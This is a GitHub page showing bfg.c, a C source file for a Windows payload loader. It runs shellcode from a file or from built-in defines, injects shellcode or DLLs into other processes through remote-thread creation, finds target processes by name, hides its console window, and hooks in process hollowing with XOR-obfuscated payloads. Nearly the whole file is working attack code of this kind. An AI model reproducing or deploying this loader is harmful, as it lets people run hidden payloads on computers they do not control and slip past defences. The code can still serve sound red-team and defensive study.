-
Notifications
You must be signed in to change notification settings - Fork 7
/
Copy pathbfg.c
429 lines (368 loc) · 9.64 KB
/
bfg.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
/*
Author: Daniel Sauder, Florian Saager
License: https://www.gnu.org/licenses/gpl.txt or LICENSE file
Web: https://github.com/govolution/bfg
*/
// " .==,_ \n"
// " .===,_`\\ \n"
// " .====,_ ` \\ .====,__ \n"
// "--- .==-,`~. \\ `:`.__, \n"
// " --- `~~=-. \\ /^^^ MEEP MEEP \n"
// " --- `~~=. \\ / \n"
// " `~. \\ / \n"
// " ~. \\____./ \n"
// " `.=====) \n"
// " ___.--~~~--.__ \n"
// " ___\\.--~~~ ~~~---.._|/ \n"
// " ~~~\\\" / \n"
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <windows.h>
#include <tchar.h>
#include <winternl.h>
#include "defs.h"
#ifdef IMAGE
#include <psapi.h>
#endif
#ifdef PROCESS_HOLLOWING
#include "include/hollow.h"
#endif
int get_filesize(char *fvalue);
unsigned char* load_file(char *fvalue, unsigned char *buf, int size2);
void exec_shellcode(unsigned char *shellcode);
void exec_shellcode64(unsigned char *shellcode);
#ifdef INJECT_SHELLCODE
DWORD inject_sc_process(unsigned char *shellcode, DWORD pid);
#endif
#ifdef INJECT_DLL
DWORD InjectDLL(PCHAR pDll, DWORD dwProcessID);
#endif
#ifdef IMAGE
DWORD get_pid_by_name(char *imgname);
#endif
#ifdef PROCESS_HOLLOWING
typedef LONG (WINAPI *NtUnmapViewOfSection) (HANDLE ProcessHandle, PVOID BaseAddress);
void newRunPE(LPSTR szFilePath, PVOID pFile, LPTSTR commandLine);
#endif
int main (int argc, char **argv)
{
#ifdef QUIET
ShowWindow(GetConsoleWindow(), SW_HIDE);
#endif
char *fvalue = NULL;
int index;
int c;
opterr = 0;
#ifdef LVALUE
fvalue=argv[1];
#endif
#ifdef PRINT_DEBUG
printf ("fvalue = %s ", fvalue);
for (index = optind; index < argc; index++)
printf ("Non-option argument %s\n", argv[index]);
#endif
// compute #defines from defs.h
#ifdef FVALUE
int size = strlen(FVALUE);
fvalue=(char*)malloc(size);
strcpy(fvalue,FVALUE);
#endif
// exec shellcode from a given file or from defs.h
if (fvalue)
{
unsigned char *buffer;
unsigned char *shellcode;
int size;
//#ifndef FVALUE
#ifdef LVALUE
#ifdef PRINT_DEBUG
printf("exec shellcode from file\n");
#endif
size = get_filesize(fvalue);
buffer = load_file(fvalue, buffer, size);
//shellcode=buffer;
unsigned char *buf =buffer;
#endif
#ifdef FVALUE
size = strlen (FVALUE);
buffer = FVALUE;
#endif
#ifndef LOADEXEC_DLL
#ifndef PROCESS_HOLLOWING
#ifndef INJECT_DLL
shellcode = buf; //buf is from defs.h if shellcode is included
#endif
#endif
#endif
#ifndef INJECT_SHELLCODE
#ifndef X64
exec_shellcode(shellcode);
#endif
#ifdef X64
exec_shellcode64(shellcode);
#endif
#endif
#ifdef INJECT_SHELLCODE
#ifndef IMAGE
int tmp;
#ifndef LVALUE
tmp=atoi(argv[1]);
#endif
#ifdef LVALUE
tmp=atoi(argv[2]);
#endif
int r;
r=inject_sc_process(shellcode, tmp);
#ifdef PRINT_DEBUG
printf("return from inject_sc_process, val: %d\n",r);
#endif
#endif
#endif
#ifdef IMAGE
#ifdef INJECT_SHELLCODE
printf("Imagename to search: %s\n", IMAGE);
int tmp=get_pid_by_name(IMAGE);
#ifdef PRINT_DEBUG
printf("PID %d\n", tmp);
#endif
inject_sc_process(shellcode, tmp);
#endif
#endif
}
#ifdef INJECT_DLL
#ifdef PID
CHAR pDllPath[5000] = "";
GetFullPathNameA(argv[1], 5000, pDllPath, NULL);
return InjectDLL(pDllPath, atoi(argv[2]));
#endif
#ifdef IMAGE
int tmp=get_pid_by_name(IMAGE);
#ifdef PRINT_DEBUG
printf("Imagename to search: %s\n", IMAGE);
printf("PID %d\n", tmp);
#endif
CHAR pDllPath[5000] = "";
GetFullPathNameA(argv[1], 5000, pDllPath, NULL);
return InjectDLL(pDllPath, tmp);
#endif
#endif
#ifdef PROCESS_HOLLOWING
#ifdef XOR_OBFUSCATION
// Deobfuscate payload
// (payloadSize, keyByte0 and payload specified in defs.h by make_bfg)
// deobfuscate() defined in hollow.h
deobfuscate(payload, payloadSize, keyByte0);
#endif
#ifdef ALT_OBFUSCATION
// Alternative, more complex deobfuscation of payload
// (payloadSize, keyByte0, keyByte1 and payload specified in defs.h by make_bfg)
// altDeobfuscate() defined in hollow.h
altDeobfuscate(payload, payloadSize, keyByte0, keyByte1);
#endif
// Instanciate target process
// Target process specified in first bfg argument argv[1]
// Command line arguments for payload in second bfg argument argv[2]
char commandLine [256];
strcpy(commandLine, argv[1]);
// Handle empty command line arguments for payload executable
// Relevant if user does not specify "" as second bfg argument
if(argv[2]) {
strcat(commandLine, " ");
strcat(commandLine, argv[2]);
}
// Instanciate target and pass command line arguments
#ifdef X64
newRunPE64(argv[1], payload, commandLine);
#else
newRunPE32(argv[1], payload, commandLine);
#endif
#endif
#ifdef LOADEXEC_DLL
HANDLE hModule = LoadLibrary(argv[1]);
#endif
return 0;
}
#if defined(LVALUE) || defined(UVALUE)
int get_filesize(char *fvalue)
{
int size,rc1;
FILE *fp1 = fopen(fvalue, "rb");
if (fp1 == NULL)
{
printf("get_filesize, %s not found\n", fvalue);
return 0;
}
for (size = 0; (rc1 = getc(fp1)) != EOF; size++) {}
fclose(fp1);
#ifdef PRINT_DEBUG
printf("get_filesize, filesize %s: %d\n", fvalue, size);
#endif
return size;
}
#endif
#if defined(LVALUE) || defined(UVALUE)
// return pointer to text buffer
unsigned char* load_file(char *fvalue, unsigned char *buffer, int size)
{
#ifdef PRINT_DEBUG
printf("load_file called: fvalue: %s, size: %d\n", fvalue, size);
#endif
//allocate buffer, open file, read file to the buffer, close the file
buffer=(unsigned char*)malloc(size+1);
int i, rc;
for (i=0; i<size; i++)
buffer[i]=0x0;
FILE *fp = fopen(fvalue, "rb");
if (fp == NULL)
{
printf("load_file, %s not found\n", fvalue);
return 0;
}
for (i=0; i<size; i++)
{
rc = getc(fp);
buffer[i] = rc;
}
#ifdef PRINT_DEBUG
printf("%s\n",buffer);
#endif
fclose(fp);
return buffer;
}
#endif
#ifndef X64
void exec_shellcode(unsigned char *shellcode)
{
#ifdef PRINT_DEBUG
printf("exec_shellcode\n ");
int size=strlen(shellcode);
printf("shellcode size: %d\n", size);
#endif
int (*funct)();
funct = (int (*)()) shellcode;
(int)(*funct)();
}
#endif
#ifdef X64
void exec_shellcode64(unsigned char *shellcode)
{
#ifdef PRINT_DEBUG
printf("exec_shellcode64\n ");
int size=strlen(shellcode);
printf("shellcode size: %d\n", size);
#endif
int len=strlen(shellcode);
DWORD l=0;
VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l);
(* (int(*)()) shellcode)();
}
#endif
#ifdef INJECT_SHELLCODE
#define CREATE_THREAD_ACCESS (PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ)
DWORD inject_sc_process(unsigned char *shellcode, DWORD pid)
{
PBYTE pShellcode = shellcode;
SIZE_T szShellcodeLength = strlen(shellcode);
HANDLE hProc;
HANDLE hRemoteThread;
PVOID pRemoteBuffer;
DWORD dwProcessID = pid;
if(!dwProcessID) {
return 1;
}
hProc = OpenProcess(CREATE_THREAD_ACCESS, FALSE, dwProcessID);
if(!hProc) {
return 2;
}
pRemoteBuffer = VirtualAllocEx(hProc, NULL, szShellcodeLength, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
if (!pRemoteBuffer) {
return 4;
}
if (!WriteProcessMemory(hProc, pRemoteBuffer, pShellcode, szShellcodeLength, NULL)) {
return 5;
}
hRemoteThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteBuffer, NULL, 0, NULL);
if (!hRemoteThread) {
return 6;
}
CloseHandle(hProc);
return 0;
}
#endif
#ifdef IMAGE
DWORD get_pid_by_name(char *imgname)
{
DWORD aProcesses[1024], cbNeeded, cProcesses;
unsigned int i;
if ( !EnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) )
{
return -1;
}
cProcesses = cbNeeded / sizeof(DWORD);
for ( i = 0; i < cProcesses; i++ )
{
if( aProcesses[i] != 0 )
{
DWORD processID = aProcesses[i];
TCHAR szProcessName[MAX_PATH] = TEXT("<unknown>");
HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ,
FALSE, processID );
if (NULL != hProcess )
{
HMODULE hMod;
DWORD cbNeeded;
if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod),
&cbNeeded) )
{
GetModuleBaseName( hProcess, hMod, szProcessName,
sizeof(szProcessName)/sizeof(TCHAR) );
}
}
if (strcmp(szProcessName,IMAGE) == 0)
{
CloseHandle( hProcess );
return processID;
}
CloseHandle( hProcess );
}
}
return -2;
}
#endif
#ifdef INJECT_DLL
#define CREATE_THREAD_ACCESS (PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ)
DWORD InjectDLL(PCHAR pDll, DWORD dwProcessID)
{
HANDLE hProc;
HANDLE hRemoteThread;
LPVOID pRemoteBuffer;
LPVOID pLoadLibAddr;
if(!dwProcessID) {
return 1;
}
hProc = OpenProcess(CREATE_THREAD_ACCESS, FALSE, dwProcessID);
if(!hProc) {
return 2;
}
pLoadLibAddr = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
if (!pLoadLibAddr) {
return 3;
}
pRemoteBuffer = VirtualAllocEx(hProc, NULL, strlen(pDll), (MEM_RESERVE | MEM_COMMIT), PAGE_READWRITE);
if (!pRemoteBuffer) {
return 4;
}
if (!WriteProcessMemory(hProc, pRemoteBuffer, pDll, strlen(pDll), NULL)) {
return 5;
}
hRemoteThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)pLoadLibAddr, pRemoteBuffer, 0, NULL);
if (!hRemoteThread) {
return 6;
}
CloseHandle(hProc);
return 0;
}
#endif